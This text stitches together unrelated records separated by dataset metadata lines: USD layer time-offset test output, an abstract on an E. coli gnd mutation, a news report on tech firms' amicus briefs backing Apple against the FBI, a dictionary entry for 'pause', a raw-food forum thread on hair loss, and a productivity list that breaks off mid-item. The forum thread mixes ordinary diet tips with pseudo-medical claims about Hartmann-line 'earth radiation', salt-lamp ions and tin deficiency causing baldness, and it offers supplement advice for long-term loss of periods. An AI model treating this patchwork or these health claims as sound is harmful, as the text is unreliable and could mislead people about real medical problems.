s_12fps.sdf sublayer (offset=10.00, scale=4.00) ss.sdf sublayer (offset=50.00, scale=4.00) ss_48tcps.sdf sublayer (offset=50.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=50.00, scale=4.00) ss_12fps.sdf sublayer (offset=50.00, scale=8.00) ref.sdf /Ref reference (offset=70.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_48tcps.sdf /Ref reference (offset=70.00, scale=4.00) ref_s.sdf sublayer (offset=0.00, scale=2.00) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_s_12fps.sdf sublayer (offset=0.00, scale=4.00) ref_24tcps_12fps.sdf /Ref reference (offset=70.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_12fps.sdf /Ref reference (offset=70.00, scale=16.00) ref_s.sdf sublayer (offset=0.00, scale=0.50) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.25) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=0.50) ref.sdf /Ref reference (offset=60.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_48tcps.sdf /Ref reference (offset=60.00, scale=4.00) ref_s.sdf sublayer (offset=0.00, scale=2.00) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_s_12fps.sdf sublayer (offset=0.00, scale=4.00) ref_24tcps_12fps.sdf /Ref reference (offset=60.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_12fps.sdf /Ref reference (offset=60.00, scale=16.00) ref_s.sdf sublayer (offset=0.00, scale=0.50) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.25) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=0.50) ref.sdf /Ref reference (offset=90.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_48tcps.sdf /Ref reference (offset=90.00, scale=4.00) ref_s.sdf sublayer (offset=0.00, scale=2.00) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_s_12fps.sdf sublayer (offset=0.00, scale=4.00) ref_24tcps_12fps.sdf /Ref reference (offset=90.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_12fps.sdf /Ref reference (offset=90.00, scale=16.00) ref_s.sdf sublayer (offset=0.00, scale=0.50) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.25) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=0.50) ------------------------------------------------------------------------ Results for composing </S4> Prim Stack: s_12fps.sdf /S4 Time Offsets: root.sdf /S4 root (offset=0.00, scale=1.00) s.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_48tcps.sdf sublayer (offset=10.00, scale=1.00) ss.sdf sublayer (offset=20.00, scale=4.00) ss_48tcps.sdf sublayer (offset=20.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=20.00, scale=4.00) ss_12fps.sdf sublayer (offset=20.00, scale=8.00) s_24tcps_12fps.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_12fps.sdf sublayer (offset=10.00, scale=4.00) ss.sdf sublayer (offset=50.00, scale=4.00) ss_48tcps.sdf sublayer (offset=50.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=50.00, scale=4.00) ss_12fps.sdf sublayer (offset=50.00, scale=8.00) ------------------------------------------------------------------------ Results for composing </S3> Prim Stack: s_24tcps_12fps.sdf /S3 Time Offsets: root.sdf /S3 root (offset=0.00, scale=1.00) s.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_48tcps.sdf sublayer (offset=10.00, scale=1.00) ss.sdf sublayer (offset=20.00, scale=4.00) ss_48tcps.sdf sublayer (offset=20.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=20.00, scale=4.00) ss_12fps.sdf sublayer (offset=20.00, scale=8.00) s_24tcps_12fps.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_12fps.sdf sublayer (offset=10.00, scale=4.00) ss.sdf sublayer (offset=50.00, scale=4.00) ss_48tcps.sdf sublayer (offset=50.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=50.00, scale=4.00) ss_12fps.sdf sublayer (offset=50.00, scale=8.00) ------------------------------------------------------------------------ Results for composing </S2> Prim Stack: s_48tcps.sdf /S2 Time Offsets: root.sdf /S2 root (offset=0.00, scale=1.00) s.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_48tcps.sdf sublayer (offset=10.00, scale=1.00) ss.sdf sublayer (offset=20.00, scale=4.00) ss_48tcps.sdf sublayer (offset=20.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=20.00, scale=4.00) ss_12fps.sdf sublayer (offset=20.00, scale=8.00) s_24tcps_12fps.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_12fps.sdf sublayer (offset=10.00, scale=4.00) ss.sdf sublayer (offset=50.00, scale=4.00) ss_48tcps.sdf sublayer (offset=50.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=50.00, scale=4.00) ss_12fps.sdf sublayer (offset=50.00, scale=8.00) ------------------------------------------------------------------------ Results for composing </S1> Prim Stack: s.sdf /S1 Time Offsets: root.sdf /S1 root (offset=0.00, scale=1.00) s.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_48tcps.sdf sublayer (offset=10.00, scale=1.00) ss.sdf sublayer (offset=20.00, scale=4.00) ss_48tcps.sdf sublayer (offset=20.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=20.00, scale=4.00) ss_12fps.sdf sublayer (offset=20.00, scale=8.00) s_24tcps_12fps.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_12fps.sdf sublayer (offset=10.00, scale=4.00) ss.sdf sublayer (offset=50.00, scale=4.00) ss_48tcps.sdf sublayer (offset=50.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=50.00, scale=4.00) ss_12fps.sdf sublayer (offset=50.00, scale=8.00) ------------------------------------------------------------------------ Results for composing </Root> Prim Stack: root.sdf /Root Time Offsets: root.sdf /Root root (offset=0.00, scale=1.00) s.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_48tcps.sdf sublayer (offset=10.00, scale=1.00) ss.sdf sublayer (offset=20.00, scale=4.00) ss_48tcps.sdf sublayer (offset=20.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=20.00, scale=4.00) ss_12fps.sdf sublayer (offset=20.00, scale=8.00) s_24tcps_12fps.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_12fps.sdf sublayer (offset=10.00, scale=4.00) ss.sdf sublayer (offset=50.00, scale=4.00) ss_48tcps.sdf sublayer (offset=50.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=50.00, scale=4.00) ss_12fps.sdf sublayer (offset=50.00, scale=8.00)
null
minipile
NaturalLanguage
mit
null
Fitness effects of a deletion mutation increasing transcription of the 6-phosphogluconate dehydrogenase gene in Escherichia coli. Directed evolution in microbial organisms provides an experimental approach to molecular evolution in which selective forces can be controlled and favorable mutations analyzed at the molecular level. Here we present an analysis of a mutation selected in Escherichia coli in response to growth in a chemostat in which the limiting nutrient was gluconate. The selectively favored mutation, designated gnd+ (862), occurred in the gene gnd coding for 6-phosphogluconate dehydrogenase, used in gluconate metabolism. Although the allele is strongly favored in chemostats in which the limiting nutrient is gluconate, the selective effects of gnd+ (862) are highly dependent on growth conditions. In chemostats in which growth is limited by a mixture of gluconate and either ribose, glucose, or succinate, the gnd+ (862) allele is favored, disfavored, or neutral according to the relative concentrations of the substrates. The gnd+ (862) allele results from a deletion of 385 nucleotide pairs in the region 5' to the promoter of gnd, and one endpoint of the deletion is contiguous with the terminus of an IS5 insertion sequence located near gnd in E. coli K12. The gnd+ (862) allele shows a marked increase in transcription that accounts for most or all of the increased enzyme activity.
null
minipile
NaturalLanguage
mit
null
If Apple obeys the FBI’s order, it would set a dangerous precedent for the future, briefs claim. 32 of the world’s largest internet, social media, and technology companies have united behind Apple, as the Cupertino-based tech giant fights the FBI’s demands to unlock the phone of Syed Farook, one of the San Bernardino shooters. The companies filed two separate amicus briefs yesterday (March 3) in the United States Distrct Court for the Central District of California, where Apple is challenging a court order to comply with the FBI’s demands. Parties not directly involved in a court case, known as “amicus curiae,” or “friend of the court,” file these briefs to offer unsolicited additional information to a court, in the hope of influencing a case’s outcome. The two new filings join a long list of law professors, civil liberties activists, and consumer groups supporting Apple in the case. Both of the briefs denounce the government’s use of the All Writ’s Act to demand that Apple develop a special “master key” software version of its operating system that can bypass existing security measures, and ultimately grant authorities access to Farook’s phone. The 227-year-old law empowers courts to issue orders to third parties when no other specific statute applies. It has been used in the past to compel telecommunications companies to install wiretaps or record phone conversations. If Apple obeys the FBI’s order, it would set a dangerous precedent for the future, both briefs claim. Law enforcement agencies of all types could demand tech companies provide access to private user data. More worryingly, governments abroad could demand Apple do the same. Make no mistake: If the government prevails in this case, it will seek many such decisions. The government’s motion reassures this Court and the public that the request here is a one-time-only hack. But there arealready strong indications that law enforcement will ask for broad authority under the All Writs Act on facts far different from the terrorism investigation at hand. For example, FBI Director James Comey just days ago told the House Judiciary Committee that this Court’s decision will be “potentially precedential” in other cases involving similar technology. Manhattan District Attorney Cyrus Vance, Jr., likewise told journalists that he“[a]bsolutely” would seek access to all locked phones linked to criminalproceedings if the government’s theory were to prevail here. That is exactly why this Court should reject any case-specific arguments the government makes here. Investigative tools meant for extraordinary cases may become standard in ordinary ones. As one court has already observed, “[n]othing in the government’s arguments suggests any principled limit on how far a court may go. A 31-page brief, submitted by Amazon, Box, Cisco, Dropbox, Evernote, Facebook, Google, Microsoft, Mozilla, Nest, Pinterest, Slack, Snapchat, WhatsApp, and Yahoo, also denounces the invocation of the All Writs Act. The companies argue that Congress, not the judiciary, should decide when the act is implemented. The brief reads: In light of rapidly evolving technology and its tremendous social benefits, Congress is better suited to confront the issues here. And indeed, Congress has already grappled with these issues on many occasions—leading to a comprehensive legislative scheme for regulating investigative methods. Intel and AT&T are among the companies that have independently submitted similar briefs to the court. On Thursday (Mar. 3), Apple formally filed an appeal against the court order. As the case goes forward, the US government will be fighting not just Apple, but the entire US tech industry.
null
minipile
NaturalLanguage
mit
null
pause pause compensatory pause the period following a premature ventricular contracture, which causes the R-R cycles of the premature and normal beats to equal the length of two normal beats when added together. pause (pawz), Temporary stop. [G. pausis, cessation] pause (pawz) an interruption or rest. compensatory pause the pause in impulse generation after an extrasystole, either full if the sinus node is not reset or incomplete or noncompensatory if the node is reset and the cycle length is disrupted. sinus pause a transient interruption in the sinus rhythm, of a duration that is not an exact multiple of the normal cardiac cycle. pause (pawz) Temporary stop. [G. pausis, cessation] pause an interruption, or rest. compensatory pause the pause after a premature ventricular systole, related to blockage of one beat of the basic pacemaker of the heart. This ruling should give pause to people--especially to health care providers--who seek to hide misdeeds from public view by diverting them to arbitration," said John Vail of the Center for Constitutional Litigation (CCL) in Washington, D. The plan suggests the soon to be independent ISP is readying an altogether more aggressive content strategy as a means to realize new revenue opportunites, and should give pause for thought to erstwhile potential content partners such as QXL Ltd, the online auction specialist which rumor has it plans to be the UK's second big . The saga of "the lost convoy," which meandered through ambush after ambush, taking heavy casualties, before returning to the base, should give pause to those who believe that perfect "situational awareness" will sweep away the fog of war. This fact, as much as anything else, should give pause to the North American foundry industry, which has long suffered at the hands of suppliers from different industries that have simply out-marketed metalcasting and its traditional products. Also in closing, this book can provide insightful and objective observations to those of us who do work in the field of alcohol and drug treatment, and give pause for reflection on our own interactions with clients. This extraordinary, well-reasoned and data-filled call for avoiding a military strike on Iran and the civilian casualties therefrom should give pause to anyone contemplating military strikes," said Amos Jordan, former CEO of the Center for Strategic and International Studies, and Brigadier General, U. All content on this website, including dictionary, thesaurus, literature, geography, and other reference data is for informational purposes only. This information should not be considered complete, up to date, and is not intended to be used in place of a visit, consultation, or advice of a legal, medical, or any other professional.
null
minipile
NaturalLanguage
mit
null
beautiful hair I used to have very thick, shiny, wavy hair. I was on a heavy SAD diet and then drastically changed my eating habbits pretty much overnight and lost about 25 lbs. For about two years I cut out fat entirely from my diet and for the past 3 years have also stopped menstruating. My hair is now thin and dull. Since I have very low estrogen and do not get my period I think this has attributed to my hair. I know estrogen has a strong impact on hair. 2 years ago I also developed Alopecia. It makes me so sad, I miss my beautiful hair and I don’t know how to fix it! I have uped my fat intake and tried maca for about 3 months but nothing has worked. Any advice? Comments Try to eat a lot of flax and flaxoil, avocado, sprouted grains and other sprouts, carrots, beets, cucumbers. These are all very good for the hair. Try to rinse it with ACV mixed in some water, you may add some rosemary essential oil to it. It is very good for the hair, rosemary stimulates hair growth. Nettle tea is also fantastic for hair growth. I’ve read that it’s not good to lose your period. Not to raise alarm, but it might the hair and period loss might be a sign that you’re not getting enough fat – women need fat. When you lose your period it’s because your body thinks there’s a drought, putting non vital systems to rest in order to save energy and resorces for vital ones. I agree that more fat like avocados, nuts etc should be added, like Flybaby writes. fats are good and so important. i suggest flax, flax, flax as well as sunflower seeds and pumpkin seeds. we all need these essential fatty acids for our health. chia seeds, almonds and walnuts are great too! The hair is the last area on your body to get nutrition. So if you aren’t getting enough for the whole body, the hair isn’t going to get any. Yes, get those fats in! I would suggest to start taking some MSM too – very good for the hair. Also, what sort of shampoo and conditioner do you use if any? Please consider switching to more natural ways to clean your hair (check out our Shampoo or not to shampoo thread in this forum – it is pretty long but lots of us here are having success with this method). The reason I suggest this is because your hair is in a very malnutritive and fragile state right now and you need it to be strong to get growing back again. Other things to eat for your hair are cucumbers. Start doing scalp massages too – be gentle since you have hair loss. You want to get the blood flowing up your scalp so your follicles get some much needed nutrition. For the fats, I would recommended eating the avocadoes and also coconut oil. Woman who use coconut oil have the most beautiful hair. Eat it and massage a bit into your scalp when you do your scalp massages (use it sparingly though since it is heavy and can get oily!). The other oils mentioned by others are good too – but definatley coconut oil – but it in your smoothies. You can even just take a tablespoon yourself. Oh, I would recommended Brazil Nuts. When people severely restrict their diets, it can catch up with them in ways like hair loss. Look at anorexics – many of them start losing their hair. The body considers the hair not really something that is necessary to keep the body alive and functioning so that is way it is one of the last things to get nutrition. Since you were heavy SAD, one of the things that some rawies experience when they go raw is hair loss but it eventually grows back – they think it is the bodies way of getting rid of old “SAD” hair. If you can, get a copy of David Wolfes “Eating for Beauty”. It is more of a guide but it suggestion of which raw foods and supplements you can take for hair. Thank you all so much for your response. I have started to include flax, avacados, seeds, nuts, and coconut butter into my diet a few months ago but maybe not enough? My GYN says its my brain telling my body that right now is not a good time to have a baby because it is a high stress enviornment. I am confused because I am not underweight I am 5’4 and 118lbs. Also, my hair grows fast but just so dull and thin. So could it be just stress or is it my diet? I will deffinately try MSM queenfluff I really appreciate the advice. lovetobenatural, you are not the only one. I almost have the EXACT same hair issue as you! I added MSM into my diet but I think its too soon to see any improvements in hair quality. Gosh, I remember how EVERYONE used to comment on my hair being incredibly shiny, thick, brown with a tint of gold in light…now, there’s no other word to describe it than lifeless. I am also 5’4 and…I haven’t checked my weight for a while. I think I am a little below you. For ME, the increase of fat intake, especially fax and flax oils didn’t help much. Maybe I wasn’t having enough? I have to admit though, my skin is reeeally good and people complement me about it alot. I just don’t know why my hair is missing all the vitality. I don’t have my period yet either. Got it once when I was 13 and then never again. Now I’m 17. Wierd huh? I hope I don’t sound like an attention-seeker, like “oooo look how beautiful I am!”. TRRRUST ME, I am far from that. But I just wanted to make a point that the greens, veggies, fruits, sprouts, raw fats (and/or MSM?) has been doing my skin wonders, but not my hair. queenfluff, has anyone mentioned yet that you should be some kind of a professional hair consultant type person? Or are you one already? You are very knowledgable and helpful, I might as well add wonderful! when it comes to hair topics!!!! Actually, I used to be a hair stylist which is why I know alot of stuff about hair.:) I went to beauty school and I have a degree in cosmetology but I don’t use it any more. I still know how to do hair though. I cut my bf’s hair and my own (and other people if they ask). So I guess I have always been “into” hair – trying to figure out how to get my hair to grow better and faster etc (I used to fry my hair out all the time when I did hair trying new colors and perms – I was my own guinea pig) so I am always reading and looking things up. Plus I used to be a product pusher myself so I know how those things work. Believe it or not, I don’t have the best looking hair either – it is on the thinner side ( probably diet related too – got thinner when I went veg and a little more when I went vegan and a little bit when raw – I am not 100% though) and I am getting some greys! Eek! I have some breakage and it is on the dry side. But I have gone up and down with bad hair and some hair loss issues so I know how it is to have hair crisises so I like to share with others what has worked for me and the knowledge I have. :) I think it is unfortunate that people get ripped off by buying all these expensive products that promise miracles.(and believe I have bought them too) and obviously don’t do anything. It is bad enough you are losing your hair, you don’t want to lose your money too! I learned something today that I didn’t know – for the MSM, make sure you get the OptiMSM. It is apparently the more purer form of MSM which is created by a distilling method. I wasn’t taking the MSM for a while and I finally went out and bought some today. And please make sure there isn’t any caking agents or other stuff like that in it – the company will use that as filler so they can give you less MSM. I bought the Vitamin Shoppe brand – 16 oz for 24$ – and it is the OptiMSM and there are no fillers. Oh also they have Organic Coconut oil – a huge bottle (29 oz) for 13$ – it is cold pressed so my bf says it is raw. Pretty good deal! Some more “food for thought” too – the only part of your hair that is “alive” is the part that is still in your head that you can’t see -meaning the hair you can see is dead – the alive part is in your follicle where the hair is created and grown – so for you to get the thickest and best hair you can, you need to do stuff to those follicles – which is why you need to get the nutrition inside to get good hair coming out. You can still use things to get the hair you can see looking nice too – but the hair you have outside the scalp is what you body produced in the follicles. So, if your hair doesn’t look great there, it didn’t get created properly inside – which is why it makes sense that have to have great hair you must grow it first! I will go through my Eating for Beauty book tonight and make a list of the foods mentioned by David Wolfe for good hair. I’ll post them when I am done (I need a refresher myself!). But don’t forget to do the scalp massages – those have always been “no fail” for me in growing hair. Circulation really is key – so exercise (stand on your head if you want too). My hair grew its best when I was working out everyday – and I don’t do that anymore so I know that is why my hair isn’t at isn’t best right now! Ok, I browsed through my book and got a list. This list is not exhaustive of course – there are plenty of other foods listed – I just put some examples. Also, many of the foods I put here and in the books have more than one of the important vitamins or minerals needed for great hair so you might be able to pick a handful of good ones and have all the important nutrients covered! Pretty much all these nutrients are needed in some supply for good hair: Sulfur – MSM, onions, radishes, hemp seeds, Aloe Vera (has MSM) Silicon – cucumber skins, nettles (good to use on your scalp and hair in juice form too – I have use this and it makes the hair really strong) Vitamin A – Arugala, carrots, Papaya (you need the vitamin A combined with the sulfur and silicon for good hair) Like I said list isn’t exhaustive and their may be other things you might need that you are deficient in too (biotin is said to be important for hair too but wasn’t really mentioned in the book – swiss chard, almonds and walnuts have biotin) Wow, queenfluff. I have been eating many things on that list and have lately noticed fewer grays and definitely thicker hair. I only use a little shampoo 1-2x a week, and lately have been putting jojoba oil on the ends while it’s still wet. It really adds a nice shine. lovetobenatural, MSM is an organic form of sulphur which is quickly lost when we cook our foods. Also, because of pollution in our atmosphere its harder to obtain naturally. Check out this link: http://www.davedraper.com/msm.html One other thing to consider is iron levels. This might also explain why you stopped having your period. My hair has thinned also, and when I went to donate blood I barely passed the iron test. Nettles have 3x the iron as spinach and it’s more absorbable also. You can buy them from health food stores already dried, or you can pick them and dry your own. Mine dried in about a day. Once they’re dry they can’t sting you anymore. Try to stick to the new growth through as I read that older leaves contain an irritant to the kidneys. Thanks for the list Queenfluff. I read the book but haven’t put it all together yet and don’t always eat enough variety. If I were to focus on certain things in the list – just based on what I know about hair – I would focus on the things with iron, MSM, zinc and protein (although David Wolfe says that what is normally referred to as a protein deficiency is really an MSM deficiency but he does mention protein in the book). You really need a combo of things to get good hair. Hemp seeds cover alot of the important nutrients. In fact, in the book the list of things that hemp seeds have is really long. I think they have all the minerals listed above and some other great ones too. They have sulfur, zinc, iron, manganese, silicon – the only one not on the list is selenium. They also have tin (david wolfe says a tin deficiency is responsible for male pattern baldness) and iodine – two other minerals that have been said to be important for hair. Raw Chocoholic – Good point about the iron – I have always been slightly anemic since I went veg. Iron is important. lovetobenatural – Just wondering if you have alot of stress in your life too? You mentioned “stressful environment”. Stress is one of the number one causes of hair loss. You may not notice the corelation. You have a super stressful time and it is over and than a month or two later your hair loss might increase. Also too just wanted to mention (so you don’t get discouraged), that it can take a while to recover from hair loss – if you have been deficient in many thing for a long time, it can take a while to build up those deficiences and as such it can take just as long to recover from them. Definatley keep up your new regime for more than three months. I would look for improvement at around six months. Darn it! I am very VERY stessed out, personally. In fact, I visited a doctor back in..january I believe, because of these really bad upper stomach pains and he told me I have dypepsia due to chronic extreme stress (I’m still recovering from a really bad trauma, worse than you can ever imagine in your entire lives! Worse, but I’m not ready to share it. Still keeping it inside, keeping all the pain to build up in me, thus, dypepsia). So there’s MY answer to my hair problem. Thank you for pointing it out Queenfluff! And thanks for the nutritions tips!!! On this site, I consider you the hair expert! I think there is a direct correlation between my hair thinning, loss of my period, and the amount of emotional stress I have been under. This being said, I am confused if this is something I can correct through nutrition or if I have to reduce the stress, which I am not sure how to do. Samilicious, did you notice your hair problems arose after your stress levels increased? lovetobenatural – Yes, you can correct this. The thing is that stress depletes nutrition. You could have been eating everything good for your hair, taking MSM, doing scalp massages etc – the works – if you were very stressed out, that would trump it all. So, if your stressful period is over, you can now start over again. But at this point it doesn’t matter whether your hair loss is from stress or bad diet. Either way your body is deficient right now so start on getting the right things in you. But also, stress reduction is part of the regime – if you have too much stress (not talking everyday stress – unless you have problem controling that too – but major stressful life events) and dont get it under control, it will hard for your hair to recover. If you are in a constant state of high stress for a long time, yes, you can suffer hair loss from that. One thing you might want to check out is your scalp: does your scalp feel tense? Is it normally like that? Having a tense scalp can be a sign of stress – this is bad for the hair in the way that the tension in your scalp can reduce the circulation to the follicles. Scalp massages (esp if you use an electric one) can definately help with this. When my scalp gets tense the electric scalp massager really helps. Gets rid of headaches too! :) Just do a search for stress and hair loss – you will tons of articles on it. lovetobenatural, yes, I’m pretty sure there is a connection there. Even for my non-raw dad! He has been under SO much stress through most of his life and he is nearly 45 years old and mostly bald. I’ve seen others his age with WAY more hair then him. He has been this bald since I was pretty young, but recently when I started forcing him to try some of my morning green smoothies, he has little bits of hair growing (he is also less stress now)! Also, I don’t know if this is the case for you but I am confident that the weather plays a huge role in contributing to my depression. Especially during winter time, I’m in an aweful mood. And then when I’m in the sun, all of a sudden I feel this eruption of happiness and relaxation spread through me. I don’t know how to describe it but it feels so good to be in the sun! I thought of getting some vitamin D supplements but spring is here and the weather should be getting warmer so I thought I’ll leave it until next fall. In addition, sunflower seeds are a good source of vitamin D (but I don’t have it often enough), and there is the spectrum light bulbs that you can use instead of regular light bulbs that are supposed to be good because they mimick sunlight and many claim they are effective (lasts longer and saves more energy than regular light bulbs too!) I wish there was cure for stress but there isn’t. Its all up to us… Samilicious, When I was not raw this much I used to have the same problem winter time.However it might can be related to the stress of exams too. My best ideas against depression is exercise, aromatherapics oils, hot bathes, I have a salt lamp, its light is really nice and it sends negative ions to the air, which is very good against the harmful earth radiation, eg Hartmann lines wich surrounds us. im gonna chime in on awhim..lst time i went to the stylist she said my hair looks better than it ever ahs since she has been doing my hair like 7 years….granted i swam a ton for most of those years and now rely on yoga and biking instead( chlorine started to affect me negatively and im to chicken shit to swim in the ocean! ;) any how the two new additions to my diet since my last appointment have been daily kombucha and hemp seeds (only a tablespoon of those)my hair is long and its abused regularly in the sun, and with highlights….. jsut my two cents worth Stock up on red bell peppers, brazil nuts, and MSM. These foods are all very high in sulphur and will help to build up your hair and nails as well as rejuvenate your skin. Also try to consume avocados and flax seeds or flax oil. like flybaby stated above. God bless! I just have to say, there is a remedy for stress. There are calmers like lobelia and kava kava but for me what really worked was a supplement from Gaia herbs for adrenal fatigue, When we stress, our adrenals release cortisol and other feel good chemicals, over time our adrenals become depleted. This supplement has rhodiola, holy basil, ashwaganda, wold oats and schisandra. I started laughing-alot more and alot longer than ever before. I felt a new sense of calm I hadn’t experienced, like I could ride the waves instead of geetin’ all streesed out about every little thing! Highly recommend it! If you do green smoothies, I would do the greens that have the thing you need for the hair – like spinach. I don’t eat any blended greens at all. I don’t like green smoothies. Honestly, I haven’t really noticed that rawies who are into green smoothies really have any better hair than people who don’t do green smoothies. I thought I would bump up this topic to see how everyone is doing with their hair loss. I for one am still having problems. I am currently eating 2 to 3 tablespoons of hemp seed and am taking 1 tablespoon of Vitamineral Green daily. I also bought John Masters Deep Scalp Follicle Treatment & Volumizer for Thinning Hair in addition to trying a new supplement, GNC’s Women’s Ultra Nourishair. I just started using these products so it is way too early to notice any difference. Nuttgirl – I know you might not want to hear this but you are wasting your money with the some of the products you are buying. I have used products similar to that john Masters products before in my life too and I can tell you they don’t work. You want good hair you have to grow it. The ingredients in the John Masters products aren’t all that bad except it is mostly water and glyercin. There are lots of herbs in there that are good for hair. But honeslty you would be better off buying these bulk and drinking them as a tea or making a rinse out of them and massageing it into your scalp. It is always best to have these things at full strength and not diluted in the mixture. I am not a big supporter of vitamins for hair (and I used to take those hair vitamins ALL the time – I had rows of them on my dresser!) because I have come to realize that to get your vitamins and nutrients from your food is the best source of them. The only supplement I take is MSM. I am starting to develop some natural herbal products for hair including a hair tea which I will be selling soon. Look for post in the Other section when they are ready for purchase. If you haven’t been doing it, start doing scalp massages. Getting circulation up to your scalp is really important and honestly in all my years of trying to get my hair to grow it has been the one thing that always works when I go back to it. I am not sure of your hair condition and your lifestyle (do you have alot of stress?) but hair loss can be a combo of many factors. Keep your stress down, eat raw foods that are good for hair, get your massages in and keep your hair in good shape (if you hair is fragile and damaged, your hair will continue to fall out – get a good trim or cut a lot of it off). I greatly recommend eat to eat raw food, sleep LOTS, reduce stress. Don’t use shampoo or any products at all. Don’t use a hair dryer or hair styler of any kind. Air dry your hair – it’s key! My hair is gorgeous when i follow all these requirements. The Rawtarian Community The Rawtarian Community is one of the largest online raw food communities. In addition to this community forum, you can browse and search thousands of community recipes added by over 5000 talented Rawtarian Community members just like you! The Rawtarian Community Forum This information is not intended to replace a one-on-one relationship with a qualified health care professional and is not intended as medical advice. I encourage you to make your own health care decisions based upon your research and in partnership with like-minded, qualified health care professional(s). I wish you success on your raw journey! You currently do not have Javascript enabled! This site will not function correctly unless Javascript is enabled.
null
minipile
NaturalLanguage
mit
null
Procrastination frankly just feels good ... right up to the minute when we recall that we really must get things done. That's when it gets ugly. All of us hop into ninja mode and then scramble around until everything gets accomplished--of course, half-heartedly. Then we vow to ourselves that we'll never procrastinate again. But, deep inside, all of us know it'll happen repeatedly. It is a vicious pattern, and it won't stop unless we break it ... by becoming productive. Here are 10 productivity tricks successful people use. 1. Wake up earlier. If you rise one hour earlier than usual each day, you will be shocked at how much you will get accomplished in a week. Additionally, rising at the same time each day stabilizes your circadian rhythm. Having a circadian rhythm that is steady allows you to become more productive during the daytime because you will be energetic and alert. 2. Create a list. Few things are more satisfying than crossing an activity off the to-do list. It is tangible evidence that you truly got something accomplished, and it may motivate you to tackle your whole list in a day. 3. Take baby steps. Did you ever put a task off only to find out, when you finally got around to it, that it took just 10 minutes to do? A task, oftentimes, seems more daunting than it really is. Rather than telling yourself that you must do five loads of laundry before tomorrow, concentrate on just separating your laundry--a chore which is quicker and easier. As you get all of the laundry separated, say, 'Now it is time to toss the whites inside the washer.' When the whites are finished, concentrate on putting them into the dryer and the towels into the washer. Concentrate on every step, and soon enough, all five loads will be washed, tumble dried, folded, and put away. 4. Consume your 